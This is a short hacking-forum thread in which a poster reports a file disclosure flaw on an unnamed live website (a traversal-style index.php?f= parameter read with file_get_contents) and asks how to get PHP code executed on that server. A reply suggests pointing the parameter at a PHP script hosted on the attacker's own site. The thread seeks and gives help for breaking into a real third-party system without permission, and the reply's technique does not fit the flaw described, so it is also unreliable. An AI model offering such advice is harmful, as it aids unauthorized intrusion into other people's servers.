Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.
File Disclosure
I found a site that has a file disclosure vuln (you know index.php?f=../../and/so/on/index.php type stuff), but instead of executing the PHP code I injected it instead simply displays the file.
Instead of a simple
markupinclude($_GET['f']);
this site uses
markupecho file_get_contents($_GET['f']);
or something.
I won't disclose the site for legal reasons, but is there a way I can inject PHP code onto the server?
BTW they use Smarty.
Yeah, try storing a PHP script on your server and then make $file = http://yoursite.com/script.php.